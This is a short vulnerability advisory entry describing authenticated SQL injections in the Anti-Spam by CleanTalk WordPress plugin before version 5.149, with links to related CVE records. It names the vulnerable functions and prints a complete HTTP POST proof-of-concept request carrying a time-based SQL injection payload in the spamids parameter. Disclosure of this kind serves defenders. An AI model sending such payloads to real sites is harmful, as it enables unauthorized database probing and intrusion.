Lucene search
Nguyen Anh TienWPEX-ID:1BC28021-28C0-43FA-B89E-6B93C345E5D8HistoryNov 20, 2020 - 12:00 a.m.
Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections
2020-11-2000:00:00
Nguyen Anh Tien
339
0.001 Low
EPSS
Percentile
36.6%
Multiple authenticated SQL injections in the Anti-Spam by CleanTalk plugin 5.148 exist, however, it requires high privilege user (admin+).
Vulnerable functions: `removeLogs` and `removeSpam` at: lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php
Sleep query:
```
POST /wp-admin/users.php?page=ct_check_users&ct_worked=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
_wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action=-1&paged=1&spamids%5B%5D=30)+OR+SLEEP(1&action2=delete
```Related
openvas
openvas
WordPress CleanTalk Plugin < 5.149 SQLi Vulnerability
2021-03-22 00:00:00
wpvulndb
wpvulndb
Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections
2020-11-20 00:00:00
cve
cve
CVE-2021-24131
2021-03-18 15:15:14
cvelist
cvelist
nvd
nvd
CVE-2021-24131
2021-03-18 15:15:14
prion
prion
Sql injection
2021-03-18 15:15:00